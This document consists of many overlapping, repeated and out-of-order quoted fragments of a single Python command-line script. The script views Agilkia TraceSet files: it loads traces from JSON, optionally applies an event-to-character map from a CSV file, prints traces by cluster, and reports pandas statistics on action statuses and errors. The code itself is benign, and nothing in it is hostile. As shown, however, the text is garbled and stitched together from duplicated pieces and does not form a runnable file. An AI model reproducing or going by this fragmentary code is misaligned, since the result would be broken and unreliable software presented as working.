traceset =", "def main(): \"\"\"A command line program that prints a set of traces, plus", "\"\"\" View the traces within an Agilkia TraceSet. It prints a one-line summary", "action=REPEATS\") parser.add_argument(\"-s\", \"--status\", help=\"color events with non-zero status red, to highlight errors\", action=\"store_true\")", "{traceset.get_num_clusters()}\") print(f\"Number of events : {df.shape[0]}\") print(f\"Number of event kinds: {len(actions)}\") print(textwrap.indent(str(make_action_status_table(df, ok=args.ok)),", "if traceset.is_clustered() and not args.noclusters: clusters = traceset.get_clusters() for c in range(traceset.get_num_clusters()): print(f\"Cluster", "(plus one extra space) def make_action_status_table(df: pd.DataFrame, ok=0) -> pd.DataFrame: \"\"\"From TraceSet DataFrame,", "type=int) parser.add_argument(\"traceset\", help=\"an Agilkia traceset file (*.json)\") args = parser.parse_args() # print(f\"Args are:\",", "many got Ok vs Error.\"\"\" good = df[df.Status == ok].groupby(\"Action\").size() err = df[df.Status", "====\") df = traceset.to_pandas() statuses = df.Status.value_counts() percent_ok = 100.0 * statuses.get(args.ok, 0)", "of errors : ({100.0 - percent_ok:.2f}% total)\") print(textwrap.indent(str(error_counts), \" \")) if __name__ ==", "print(\"==== event chars ====\") ev_chars = traceset.get_event_chars() for action,ch in ev_chars.items(): print(f\" {action:20s}", "args.noclusters: clusters = traceset.get_clusters() for c in range(traceset.get_num_clusters()): print(f\"Cluster {c}:\") for (i, tr)", "Totals row at bottom return pd.concat([data, totals]) def main(): \"\"\"A command line program", "ok].groupby(\"Action\").size() data = pd.DataFrame({\"Ok\": good, \"Err\": err}) data.fillna(0, inplace=True, downcast=\"infer\") data[\"Total\"] = data.Ok", "default. TODO: allow user to specify the 'Ok' status value (e.g. --ok=200 for", "repeats = [] if args.repeats is None else [args.repeats] if traceset.is_clustered() and not", "print(\"final map=\", char_map) repeats = [] if args.repeats is None else [args.repeats] if", "make_action_status_table(df: pd.DataFrame, ok=0) -> pd.DataFrame: \"\"\"From TraceSet DataFrame, creates a table of Actions", "to highlight errors\", action=\"store_true\") parser.add_argument(\"--ok\", help=\"specify the status value that represents success (default", "# print(\"final map=\", char_map) repeats = [] if args.repeats is None else [args.repeats]", "args.repeats is None else [args.repeats] if traceset.is_clustered() and not args.noclusters: clusters = traceset.get_clusters()", "action,ch in ev_chars.items(): print(f\" {action:20s} {ch}\") print(\"==== statistics ====\") df = traceset.to_pandas() statuses", "ev_chars.items(): print(f\" {action:20s} {ch}\") print(\"==== statistics ====\") df = traceset.to_pandas() statuses = df.Status.value_counts()", "import pandas as pd import argparse from pathlib import Path import textwrap import", "====\") ev_chars = traceset.get_event_chars() for action,ch in ev_chars.items(): print(f\" {action:20s} {ch}\") print(\"==== statistics", "action=\"store_true\") parser.add_argument(\"--ok\", help=\"specify the status value that represents success (default 0).\", default=\"0\", metavar=\"NUM\",", "Actions showing how many got Ok vs Error.\"\"\" good = df[df.Status == ok].groupby(\"Action\").size()", "DataFrame, creates a table of Actions showing how many got Ok vs Error.\"\"\"", "print(f\"Number of events : {df.shape[0]}\") print(f\"Number of event kinds: {len(actions)}\") print(textwrap.indent(str(make_action_status_table(df, ok=args.ok)), \"", "textwrap import agilkia INDENT = \" \" # prefix for each trace (plus", "user to specify the 'Ok' status value (e.g. --ok=200 for HTTP results) @author:", ": {traceset.get_num_clusters()}\") print(f\"Number of events : {df.shape[0]}\") print(f\"Number of event kinds: {len(actions)}\") print(textwrap.indent(str(make_action_status_table(df,", "plus some general statistics. If the TraceSet is clustered, traces will be displayed", "df.groupby(\"Error\").Action.count() if len(error_counts) > 1: print(f\"Categories of errors : ({100.0 - percent_ok:.2f}% total)\")", "def make_action_status_table(df: pd.DataFrame, ok=0) -> pd.DataFrame: \"\"\"From TraceSet DataFrame, creates a table of", "View the traces within an Agilkia TraceSet. It prints a one-line summary of", "percent_ok = 100.0 * statuses.get(args.ok, 0) / df.shape[0] # print(df.head()) print(f\"Number of traces", "If the TraceSet is clustered, traces will be displayed in clusters, by default.", "at bottom return pd.concat([data, totals]) def main(): \"\"\"A command line program that prints", "traces in-order, without clusters.\", action=\"store_true\") parser.add_argument(\"-r\", \"--repeats\", help=\"compress repeated events with action=REPEATS\") parser.add_argument(\"-s\",", "1=char. char_map = dict(zip(mapfile.iloc[:, 0], mapfile.iloc[:, 1])) # print(\"given map=\", char_map) traceset.set_event_chars(char_map) #", "(*.json)\") args = parser.parse_args() # print(f\"Args are:\", args) traceset = agilkia.TraceSet.load_from_json(Path(args.traceset)) actions =", "print(textwrap.indent(str(make_action_status_table(df, ok=args.ok)), \" \")) print(f\"Percent of status=ok : {percent_ok:.2f}%\") error_counts = df.groupby(\"Error\").Action.count() if", "print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) else: for tr in traceset.traces: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) if args.verbose:", "traceset file (*.json)\") args = parser.parse_args() # print(f\"Args are:\", args) traceset = agilkia.TraceSet.load_from_json(Path(args.traceset))", "this has just two columns: 0=action_name and 1=char. char_map = dict(zip(mapfile.iloc[:, 0], mapfile.iloc[:,", "statuses.get(args.ok, 0) / df.shape[0] # print(df.head()) print(f\"Number of traces : {len(traceset.traces)}\") print(f\"Average trace", "\"\"\" import pandas as pd import argparse from pathlib import Path import textwrap", "!= ok].groupby(\"Action\").size() data = pd.DataFrame({\"Ok\": good, \"Err\": err}) data.fillna(0, inplace=True, downcast=\"infer\") data[\"Total\"] =", "parser.parse_args() # print(f\"Args are:\", args) traceset = agilkia.TraceSet.load_from_json(Path(args.traceset)) actions = agilkia.all_action_names(traceset.traces) if args.eventchars:", "enumerate(traceset.traces): if clusters[i] == c: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) else: for tr in traceset.traces:", "repeated events with action=REPEATS\") parser.add_argument(\"-s\", \"--status\", help=\"color events with non-zero status red, to", "== ok].groupby(\"Action\").size() err = df[df.Status != ok].groupby(\"Action\").size() data = pd.DataFrame({\"Ok\": good, \"Err\": err})", "parser.add_argument(\"-r\", \"--repeats\", help=\"compress repeated events with action=REPEATS\") parser.add_argument(\"-s\", \"--status\", help=\"color events with non-zero", "pd.DataFrame, ok=0) -> pd.DataFrame: \"\"\"From TraceSet DataFrame, creates a table of Actions showing", "None else [args.repeats] if traceset.is_clustered() and not args.noclusters: clusters = traceset.get_clusters() for c", "command line program that prints a set of traces, plus some summary statistics.\"\"\"", "assume this has just two columns: 0=action_name and 1=char. char_map = dict(zip(mapfile.iloc[:, 0],", "in range(traceset.get_num_clusters()): print(f\"Cluster {c}:\") for (i, tr) in enumerate(traceset.traces): if clusters[i] == c:", "displayed in clusters, by default. TODO: allow user to specify the 'Ok' status", "for tr in traceset.traces: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) if args.verbose: print(\"==== event chars ====\")", "print(f\"Percent of status=ok : {percent_ok:.2f}%\") error_counts = df.groupby(\"Error\").Action.count() if len(error_counts) > 1: print(f\"Categories", "TODO: allow user to specify the 'Ok' status value (e.g. --ok=200 for HTTP", "is clustered, traces will be displayed in clusters, by default. TODO: allow user", "inplace=True, downcast=\"infer\") data[\"Total\"] = data.Ok + data.Err totals = pd.DataFrame([data.sum().rename(\"Total\")]) # add Totals", "event kinds: {len(actions)}\") print(textwrap.indent(str(make_action_status_table(df, ok=args.ok)), \" \")) print(f\"Percent of status=ok : {percent_ok:.2f}%\") error_counts", "0) / df.shape[0] # print(df.head()) print(f\"Number of traces : {len(traceset.traces)}\") print(f\"Average trace length", "color_status=args.status)) else: for tr in traceset.traces: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) if args.verbose: print(\"==== event", "event chars ====\") ev_chars = traceset.get_event_chars() for action,ch in ev_chars.items(): print(f\" {action:20s} {ch}\")", "traceset.get_clusters() for c in range(traceset.get_num_clusters()): print(f\"Cluster {c}:\") for (i, tr) in enumerate(traceset.traces): if", "char_map) repeats = [] if args.repeats is None else [args.repeats] if traceset.is_clustered() and", "@author: <EMAIL> \"\"\" import pandas as pd import argparse from pathlib import Path", "vs Error.\"\"\" good = df[df.Status == ok].groupby(\"Action\").size() err = df[df.Status != ok].groupby(\"Action\").size() data", ": {len(traceset.traces)}\") print(f\"Average trace length : {df.groupby('Trace').count().Action.mean():.2f}\") print(f\"Number of clusters : {traceset.get_num_clusters()}\") print(f\"Number", "0=action_name and 1=char. char_map = dict(zip(mapfile.iloc[:, 0], mapfile.iloc[:, 1])) # print(\"given map=\", char_map)", "pd.DataFrame({\"Ok\": good, \"Err\": err}) data.fillna(0, inplace=True, downcast=\"infer\") data[\"Total\"] = data.Ok + data.Err totals", "# we assume this has just two columns: 0=action_name and 1=char. char_map =", "the event-to-char map.\", action=\"store_true\") parser.add_argument(\"-e\", \"--eventchars\", help=\"a csv file containing an event-to-char map.\")", "map.\", action=\"store_true\") parser.add_argument(\"-e\", \"--eventchars\", help=\"a csv file containing an event-to-char map.\") parser.add_argument(\"-n\", \"--noclusters\",", "range(traceset.get_num_clusters()): print(f\"Cluster {c}:\") for (i, tr) in enumerate(traceset.traces): if clusters[i] == c: print(INDENT,", "data[\"Total\"] = data.Ok + data.Err totals = pd.DataFrame([data.sum().rename(\"Total\")]) # add Totals row at", "char_map = dict(zip(mapfile.iloc[:, 0], mapfile.iloc[:, 1])) # print(\"given map=\", char_map) traceset.set_event_chars(char_map) # print(\"final", "# print(df.head()) print(f\"Number of traces : {len(traceset.traces)}\") print(f\"Average trace length : {df.groupby('Trace').count().Action.mean():.2f}\") print(f\"Number", "from pathlib import Path import textwrap import agilkia INDENT = \" \" #", "with non-zero status red, to highlight errors\", action=\"store_true\") parser.add_argument(\"--ok\", help=\"specify the status value", "events with non-zero status red, to highlight errors\", action=\"store_true\") parser.add_argument(\"--ok\", help=\"specify the status", "space) def make_action_status_table(df: pd.DataFrame, ok=0) -> pd.DataFrame: \"\"\"From TraceSet DataFrame, creates a table", "plus some summary statistics.\"\"\" parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument(\"-v\", \"--verbose\", help=\"show more information,", "action=\"store_true\") parser.add_argument(\"-e\", \"--eventchars\", help=\"a csv file containing an event-to-char map.\") parser.add_argument(\"-n\", \"--noclusters\", help=\"view", "as the event-to-char map.\", action=\"store_true\") parser.add_argument(\"-e\", \"--eventchars\", help=\"a csv file containing an event-to-char", "{df.shape[0]}\") print(f\"Number of event kinds: {len(actions)}\") print(textwrap.indent(str(make_action_status_table(df, ok=args.ok)), \" \")) print(f\"Percent of status=ok", "traces, plus some summary statistics.\"\"\" parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument(\"-v\", \"--verbose\", help=\"show more", "print(f\"Args are:\", args) traceset = agilkia.TraceSet.load_from_json(Path(args.traceset)) actions = agilkia.all_action_names(traceset.traces) if args.eventchars: mapfile =", "help=\"a csv file containing an event-to-char map.\") parser.add_argument(\"-n\", \"--noclusters\", help=\"view traces in-order, without", "for each trace (plus one extra space) def make_action_status_table(df: pd.DataFrame, ok=0) -> pd.DataFrame:", "traceset.get_event_chars() for action,ch in ev_chars.items(): print(f\" {action:20s} {ch}\") print(\"==== statistics ====\") df =", "extra space) def make_action_status_table(df: pd.DataFrame, ok=0) -> pd.DataFrame: \"\"\"From TraceSet DataFrame, creates a", "traceset.set_event_chars(char_map) # print(\"final map=\", char_map) repeats = [] if args.repeats is None else", "print(\"given map=\", char_map) traceset.set_event_chars(char_map) # print(\"final map=\", char_map) repeats = [] if args.repeats", "import argparse from pathlib import Path import textwrap import agilkia INDENT = \"", "error_counts = df.groupby(\"Error\").Action.count() if len(error_counts) > 1: print(f\"Categories of errors : ({100.0 -", "parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument(\"-v\", \"--verbose\", help=\"show more information, such as the event-to-char", "= agilkia.all_action_names(traceset.traces) if args.eventchars: mapfile = pd.read_csv(args.eventchars, header=None) # we assume this has", "= traceset.get_clusters() for c in range(traceset.get_num_clusters()): print(f\"Cluster {c}:\") for (i, tr) in enumerate(traceset.traces):", "utf-8 -*- \"\"\" View the traces within an Agilkia TraceSet. It prints a", "non-zero status red, to highlight errors\", action=\"store_true\") parser.add_argument(\"--ok\", help=\"specify the status value that", "the TraceSet is clustered, traces will be displayed in clusters, by default. TODO:", "data.fillna(0, inplace=True, downcast=\"infer\") data[\"Total\"] = data.Ok + data.Err totals = pd.DataFrame([data.sum().rename(\"Total\")]) # add", "100.0 * statuses.get(args.ok, 0) / df.shape[0] # print(df.head()) print(f\"Number of traces : {len(traceset.traces)}\")", "= argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument(\"-v\", \"--verbose\", help=\"show more information, such as the event-to-char map.\",", "Agilkia TraceSet. It prints a one-line summary of each trace, plus some general", "formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument(\"-v\", \"--verbose\", help=\"show more information, such as the event-to-char map.\", action=\"store_true\") parser.add_argument(\"-e\",", "{df.groupby('Trace').count().Action.mean():.2f}\") print(f\"Number of clusters : {traceset.get_num_clusters()}\") print(f\"Number of events : {df.shape[0]}\") print(f\"Number of", "TraceSet is clustered, traces will be displayed in clusters, by default. TODO: allow", "agilkia INDENT = \" \" # prefix for each trace (plus one extra", "+ data.Err totals = pd.DataFrame([data.sum().rename(\"Total\")]) # add Totals row at bottom return pd.concat([data,", "status=ok : {percent_ok:.2f}%\") error_counts = df.groupby(\"Error\").Action.count() if len(error_counts) > 1: print(f\"Categories of errors", "args) traceset = agilkia.TraceSet.load_from_json(Path(args.traceset)) actions = agilkia.all_action_names(traceset.traces) if args.eventchars: mapfile = pd.read_csv(args.eventchars, header=None)", "totals = pd.DataFrame([data.sum().rename(\"Total\")]) # add Totals row at bottom return pd.concat([data, totals]) def", "traces : {len(traceset.traces)}\") print(f\"Average trace length : {df.groupby('Trace').count().Action.mean():.2f}\") print(f\"Number of clusters : {traceset.get_num_clusters()}\")", "traceset.traces: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) if args.verbose: print(\"==== event chars ====\") ev_chars = traceset.get_event_chars()", "[args.repeats] if traceset.is_clustered() and not args.noclusters: clusters = traceset.get_clusters() for c in range(traceset.get_num_clusters()):", "= pd.DataFrame([data.sum().rename(\"Total\")]) # add Totals row at bottom return pd.concat([data, totals]) def main():", "= traceset.to_pandas() statuses = df.Status.value_counts() percent_ok = 100.0 * statuses.get(args.ok, 0) / df.shape[0]", "\"--eventchars\", help=\"a csv file containing an event-to-char map.\") parser.add_argument(\"-n\", \"--noclusters\", help=\"view traces in-order,", ": {df.shape[0]}\") print(f\"Number of event kinds: {len(actions)}\") print(textwrap.indent(str(make_action_status_table(df, ok=args.ok)), \" \")) print(f\"Percent of", ": {percent_ok:.2f}%\") error_counts = df.groupby(\"Error\").Action.count() if len(error_counts) > 1: print(f\"Categories of errors :", "# print(\"given map=\", char_map) traceset.set_event_chars(char_map) # print(\"final map=\", char_map) repeats = [] if", "of event kinds: {len(actions)}\") print(textwrap.indent(str(make_action_status_table(df, ok=args.ok)), \" \")) print(f\"Percent of status=ok : {percent_ok:.2f}%\")", "metavar=\"NUM\", type=int) parser.add_argument(\"traceset\", help=\"an Agilkia traceset file (*.json)\") args = parser.parse_args() # print(f\"Args", "for (i, tr) in enumerate(traceset.traces): if clusters[i] == c: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) else:", "HTTP results) @author: <EMAIL> \"\"\" import pandas as pd import argparse from pathlib", "pd.concat([data, totals]) def main(): \"\"\"A command line program that prints a set of", "action=\"store_true\") parser.add_argument(\"-r\", \"--repeats\", help=\"compress repeated events with action=REPEATS\") parser.add_argument(\"-s\", \"--status\", help=\"color events with", "default=\"0\", metavar=\"NUM\", type=int) parser.add_argument(\"traceset\", help=\"an Agilkia traceset file (*.json)\") args = parser.parse_args() #", "err}) data.fillna(0, inplace=True, downcast=\"infer\") data[\"Total\"] = data.Ok + data.Err totals = pd.DataFrame([data.sum().rename(\"Total\")]) #", "agilkia.all_action_names(traceset.traces) if args.eventchars: mapfile = pd.read_csv(args.eventchars, header=None) # we assume this has just", "print(f\"Average trace length : {df.groupby('Trace').count().Action.mean():.2f}\") print(f\"Number of clusters : {traceset.get_num_clusters()}\") print(f\"Number of events", "each trace, plus some general statistics. If the TraceSet is clustered, traces will", "--ok=200 for HTTP results) @author: <EMAIL> \"\"\" import pandas as pd import argparse", "dict(zip(mapfile.iloc[:, 0], mapfile.iloc[:, 1])) # print(\"given map=\", char_map) traceset.set_event_chars(char_map) # print(\"final map=\", char_map)", "set of traces, plus some summary statistics.\"\"\" parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument(\"-v\", \"--verbose\",", "clustered, traces will be displayed in clusters, by default. TODO: allow user to", "got Ok vs Error.\"\"\" good = df[df.Status == ok].groupby(\"Action\").size() err = df[df.Status !=", "print(f\"Categories of errors : ({100.0 - percent_ok:.2f}% total)\") print(textwrap.indent(str(error_counts), \" \")) if __name__", "# prefix for each trace (plus one extra space) def make_action_status_table(df: pd.DataFrame, ok=0)", "mapfile.iloc[:, 1])) # print(\"given map=\", char_map) traceset.set_event_chars(char_map) # print(\"final map=\", char_map) repeats =", "has just two columns: 0=action_name and 1=char. char_map = dict(zip(mapfile.iloc[:, 0], mapfile.iloc[:, 1]))", "status value that represents success (default 0).\", default=\"0\", metavar=\"NUM\", type=int) parser.add_argument(\"traceset\", help=\"an Agilkia", "argparse from pathlib import Path import textwrap import agilkia INDENT = \" \"", "# add Totals row at bottom return pd.concat([data, totals]) def main(): \"\"\"A command", "not args.noclusters: clusters = traceset.get_clusters() for c in range(traceset.get_num_clusters()): print(f\"Cluster {c}:\") for (i,", "= data.Ok + data.Err totals = pd.DataFrame([data.sum().rename(\"Total\")]) # add Totals row at bottom", "map=\", char_map) repeats = [] if args.repeats is None else [args.repeats] if traceset.is_clustered()", "such as the event-to-char map.\", action=\"store_true\") parser.add_argument(\"-e\", \"--eventchars\", help=\"a csv file containing an", "print(f\" {action:20s} {ch}\") print(\"==== statistics ====\") df = traceset.to_pandas() statuses = df.Status.value_counts() percent_ok", "of traces, plus some summary statistics.\"\"\" parser = argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument(\"-v\", \"--verbose\", help=\"show", "traceset.to_pandas() statuses = df.Status.value_counts() percent_ok = 100.0 * statuses.get(args.ok, 0) / df.shape[0] #", "help=\"show more information, such as the event-to-char map.\", action=\"store_true\") parser.add_argument(\"-e\", \"--eventchars\", help=\"a csv", "one-line summary of each trace, plus some general statistics. If the TraceSet is", "[] if args.repeats is None else [args.repeats] if traceset.is_clustered() and not args.noclusters: clusters", "char_map) traceset.set_event_chars(char_map) # print(\"final map=\", char_map) repeats = [] if args.repeats is None", "statistics ====\") df = traceset.to_pandas() statuses = df.Status.value_counts() percent_ok = 100.0 * statuses.get(args.ok,", "1])) # print(\"given map=\", char_map) traceset.set_event_chars(char_map) # print(\"final map=\", char_map) repeats = []", "highlight errors\", action=\"store_true\") parser.add_argument(\"--ok\", help=\"specify the status value that represents success (default 0).\",", "else [args.repeats] if traceset.is_clustered() and not args.noclusters: clusters = traceset.get_clusters() for c in", "= traceset.get_event_chars() for action,ch in ev_chars.items(): print(f\" {action:20s} {ch}\") print(\"==== statistics ====\") df", "parser.add_argument(\"-s\", \"--status\", help=\"color events with non-zero status red, to highlight errors\", action=\"store_true\") parser.add_argument(\"--ok\",", "program that prints a set of traces, plus some summary statistics.\"\"\" parser =", "{c}:\") for (i, tr) in enumerate(traceset.traces): if clusters[i] == c: print(INDENT, tr.to_string(compress=repeats, color_status=args.status))", "are:\", args) traceset = agilkia.TraceSet.load_from_json(Path(args.traceset)) actions = agilkia.all_action_names(traceset.traces) if args.eventchars: mapfile = pd.read_csv(args.eventchars,", "good = df[df.Status == ok].groupby(\"Action\").size() err = df[df.Status != ok].groupby(\"Action\").size() data = pd.DataFrame({\"Ok\":", "help=\"specify the status value that represents success (default 0).\", default=\"0\", metavar=\"NUM\", type=int) parser.add_argument(\"traceset\",", "value (e.g. --ok=200 for HTTP results) @author: <EMAIL> \"\"\" import pandas as pd", "\" \" # prefix for each trace (plus one extra space) def make_action_status_table(df:", "clusters.\", action=\"store_true\") parser.add_argument(\"-r\", \"--repeats\", help=\"compress repeated events with action=REPEATS\") parser.add_argument(\"-s\", \"--status\", help=\"color events", "argparse.ArgumentParser(description=__doc__, formatter_class=argparse.RawDescriptionHelpFormatter) parser.add_argument(\"-v\", \"--verbose\", help=\"show more information, such as the event-to-char map.\", action=\"store_true\")", "= pd.read_csv(args.eventchars, header=None) # we assume this has just two columns: 0=action_name and", "be displayed in clusters, by default. TODO: allow user to specify the 'Ok'", "= df[df.Status != ok].groupby(\"Action\").size() data = pd.DataFrame({\"Ok\": good, \"Err\": err}) data.fillna(0, inplace=True, downcast=\"infer\")", "totals]) def main(): \"\"\"A command line program that prints a set of traces,", "the traces within an Agilkia TraceSet. It prints a one-line summary of each", "chars ====\") ev_chars = traceset.get_event_chars() for action,ch in ev_chars.items(): print(f\" {action:20s} {ch}\") print(\"====", "how many got Ok vs Error.\"\"\" good = df[df.Status == ok].groupby(\"Action\").size() err =", "just two columns: 0=action_name and 1=char. char_map = dict(zip(mapfile.iloc[:, 0], mapfile.iloc[:, 1])) #", "print(f\"Number of event kinds: {len(actions)}\") print(textwrap.indent(str(make_action_status_table(df, ok=args.ok)), \" \")) print(f\"Percent of status=ok :", "kinds: {len(actions)}\") print(textwrap.indent(str(make_action_status_table(df, ok=args.ok)), \" \")) print(f\"Percent of status=ok : {percent_ok:.2f}%\") error_counts =", "results) @author: <EMAIL> \"\"\" import pandas as pd import argparse from pathlib import", "traceset = agilkia.TraceSet.load_from_json(Path(args.traceset)) actions = agilkia.all_action_names(traceset.traces) if args.eventchars: mapfile = pd.read_csv(args.eventchars, header=None) #", "the status value that represents success (default 0).\", default=\"0\", metavar=\"NUM\", type=int) parser.add_argument(\"traceset\", help=\"an", "header=None) # we assume this has just two columns: 0=action_name and 1=char. char_map", "length : {df.groupby('Trace').count().Action.mean():.2f}\") print(f\"Number of clusters : {traceset.get_num_clusters()}\") print(f\"Number of events : {df.shape[0]}\")", "bottom return pd.concat([data, totals]) def main(): \"\"\"A command line program that prints a", "clusters, by default. TODO: allow user to specify the 'Ok' status value (e.g.", "print(f\"Cluster {c}:\") for (i, tr) in enumerate(traceset.traces): if clusters[i] == c: print(INDENT, tr.to_string(compress=repeats,", "* statuses.get(args.ok, 0) / df.shape[0] # print(df.head()) print(f\"Number of traces : {len(traceset.traces)}\") print(f\"Average", "by default. TODO: allow user to specify the 'Ok' status value (e.g. --ok=200", "return pd.concat([data, totals]) def main(): \"\"\"A command line program that prints a set", "0).\", default=\"0\", metavar=\"NUM\", type=int) parser.add_argument(\"traceset\", help=\"an Agilkia traceset file (*.json)\") args = parser.parse_args()", "if len(error_counts) > 1: print(f\"Categories of errors : ({100.0 - percent_ok:.2f}% total)\") print(textwrap.indent(str(error_counts),", "df[df.Status != ok].groupby(\"Action\").size() data = pd.DataFrame({\"Ok\": good, \"Err\": err}) data.fillna(0, inplace=True, downcast=\"infer\") data[\"Total\"]", "\"\"\"A command line program that prints a set of traces, plus some summary", "we assume this has just two columns: 0=action_name and 1=char. char_map = dict(zip(mapfile.iloc[:,", "print(df.head()) print(f\"Number of traces : {len(traceset.traces)}\") print(f\"Average trace length : {df.groupby('Trace').count().Action.mean():.2f}\") print(f\"Number of", "c: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) else: for tr in traceset.traces: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) if", "trace, plus some general statistics. If the TraceSet is clustered, traces will be", "within an Agilkia TraceSet. It prints a one-line summary of each trace, plus", "prefix for each trace (plus one extra space) def make_action_status_table(df: pd.DataFrame, ok=0) ->", "'Ok' status value (e.g. --ok=200 for HTTP results) @author: <EMAIL> \"\"\" import pandas", "{len(traceset.traces)}\") print(f\"Average trace length : {df.groupby('Trace').count().Action.mean():.2f}\") print(f\"Number of clusters : {traceset.get_num_clusters()}\") print(f\"Number of", "showing how many got Ok vs Error.\"\"\" good = df[df.Status == ok].groupby(\"Action\").size() err", "\"--noclusters\", help=\"view traces in-order, without clusters.\", action=\"store_true\") parser.add_argument(\"-r\", \"--repeats\", help=\"compress repeated events with", "\"Err\": err}) data.fillna(0, inplace=True, downcast=\"infer\") data[\"Total\"] = data.Ok + data.Err totals = pd.DataFrame([data.sum().rename(\"Total\")])", "data = pd.DataFrame({\"Ok\": good, \"Err\": err}) data.fillna(0, inplace=True, downcast=\"infer\") data[\"Total\"] = data.Ok +", "print(f\"Number of traces : {len(traceset.traces)}\") print(f\"Average trace length : {df.groupby('Trace').count().Action.mean():.2f}\") print(f\"Number of clusters", "with action=REPEATS\") parser.add_argument(\"-s\", \"--status\", help=\"color events with non-zero status red, to highlight errors\",", "errors : ({100.0 - percent_ok:.2f}% total)\") print(textwrap.indent(str(error_counts), \" \")) if __name__ == \"__main__\":", "ok=0) -> pd.DataFrame: \"\"\"From TraceSet DataFrame, creates a table of Actions showing how", "help=\"an Agilkia traceset file (*.json)\") args = parser.parse_args() # print(f\"Args are:\", args) traceset", "of events : {df.shape[0]}\") print(f\"Number of event kinds: {len(actions)}\") print(textwrap.indent(str(make_action_status_table(df, ok=args.ok)), \" \"))", "import textwrap import agilkia INDENT = \" \" # prefix for each trace", "clusters = traceset.get_clusters() for c in range(traceset.get_num_clusters()): print(f\"Cluster {c}:\") for (i, tr) in", "> 1: print(f\"Categories of errors : ({100.0 - percent_ok:.2f}% total)\") print(textwrap.indent(str(error_counts), \" \"))", "INDENT = \" \" # prefix for each trace (plus one extra space)", "df[df.Status == ok].groupby(\"Action\").size() err = df[df.Status != ok].groupby(\"Action\").size() data = pd.DataFrame({\"Ok\": good, \"Err\":", "import agilkia INDENT = \" \" # prefix for each trace (plus one", "coding: utf-8 -*- \"\"\" View the traces within an Agilkia TraceSet. It prints", "will be displayed in clusters, by default. TODO: allow user to specify the", "pd.read_csv(args.eventchars, header=None) # we assume this has just two columns: 0=action_name and 1=char.", "parser.add_argument(\"-v\", \"--verbose\", help=\"show more information, such as the event-to-char map.\", action=\"store_true\") parser.add_argument(\"-e\", \"--eventchars\",", "of status=ok : {percent_ok:.2f}%\") error_counts = df.groupby(\"Error\").Action.count() if len(error_counts) > 1: print(f\"Categories of", "if clusters[i] == c: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) else: for tr in traceset.traces: print(INDENT,", "help=\"view traces in-order, without clusters.\", action=\"store_true\") parser.add_argument(\"-r\", \"--repeats\", help=\"compress repeated events with action=REPEATS\")", "an Agilkia TraceSet. It prints a one-line summary of each trace, plus some", "a one-line summary of each trace, plus some general statistics. If the TraceSet", "for HTTP results) @author: <EMAIL> \"\"\" import pandas as pd import argparse from", "agilkia.TraceSet.load_from_json(Path(args.traceset)) actions = agilkia.all_action_names(traceset.traces) if args.eventchars: mapfile = pd.read_csv(args.eventchars, header=None) # we assume", "traces within an Agilkia TraceSet. It prints a one-line summary of each trace,", "TraceSet DataFrame, creates a table of Actions showing how many got Ok vs", "err = df[df.Status != ok].groupby(\"Action\").size() data = pd.DataFrame({\"Ok\": good, \"Err\": err}) data.fillna(0, inplace=True,", "df = traceset.to_pandas() statuses = df.Status.value_counts() percent_ok = 100.0 * statuses.get(args.ok, 0) /", "args = parser.parse_args() # print(f\"Args are:\", args) traceset = agilkia.TraceSet.load_from_json(Path(args.traceset)) actions = agilkia.all_action_names(traceset.traces)", "events : {df.shape[0]}\") print(f\"Number of event kinds: {len(actions)}\") print(textwrap.indent(str(make_action_status_table(df, ok=args.ok)), \" \")) print(f\"Percent", "map=\", char_map) traceset.set_event_chars(char_map) # print(\"final map=\", char_map) repeats = [] if args.repeats is", "map.\") parser.add_argument(\"-n\", \"--noclusters\", help=\"view traces in-order, without clusters.\", action=\"store_true\") parser.add_argument(\"-r\", \"--repeats\", help=\"compress repeated", "else: for tr in traceset.traces: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) if args.verbose: print(\"==== event chars", "value that represents success (default 0).\", default=\"0\", metavar=\"NUM\", type=int) parser.add_argument(\"traceset\", help=\"an Agilkia traceset", "# -*- coding: utf-8 -*- \"\"\" View the traces within an Agilkia TraceSet.", "row at bottom return pd.concat([data, totals]) def main(): \"\"\"A command line program that", "-*- \"\"\" View the traces within an Agilkia TraceSet. It prints a one-line", "of Actions showing how many got Ok vs Error.\"\"\" good = df[df.Status ==", "clusters[i] == c: print(INDENT, tr.to_string(compress=repeats, color_status=args.status)) else: for tr in traceset.traces: print(INDENT, tr.to_string(compress=repeats,", "0], mapfile.iloc[:, 1])) # print(\"given map=\", char_map) traceset.set_event_chars(char_map) # print(\"final map=\", char_map) repeats", "data.Ok + data.Err totals = pd.DataFrame([data.sum().rename(\"Total\")]) # add Totals row at bottom return", "if args.repeats is None else [args.repeats] if traceset.is_clustered() and not args.noclusters: clusters =", "\"--verbose\", help=\"show more information, such as the event-to-char map.\", action=\"store_true\") parser.add_argument(\"-e\", \"--eventchars\", help=\"a", "errors\", action=\"store_true\") parser.add_argument(\"--ok\", help=\"specify the status value that represents success (default 0).\", default=\"0\",", "= df[df.Status == ok].groupby(\"Action\").size() err = df[df.Status != ok].groupby(\"Action\").size() data = pd.DataFrame({\"Ok\": good,", "\"--status\", help=\"color events with non-zero status red, to highlight errors\", action=\"store_true\") parser.add_argument(\"--ok\", help=\"specify", "creates a table of Actions showing how many got Ok vs Error.\"\"\" good", "red, to highlight errors\", action=\"store_true\") parser.add_argument(\"--ok\", help=\"specify the status value that represents success", "pd import argparse from pathlib import Path 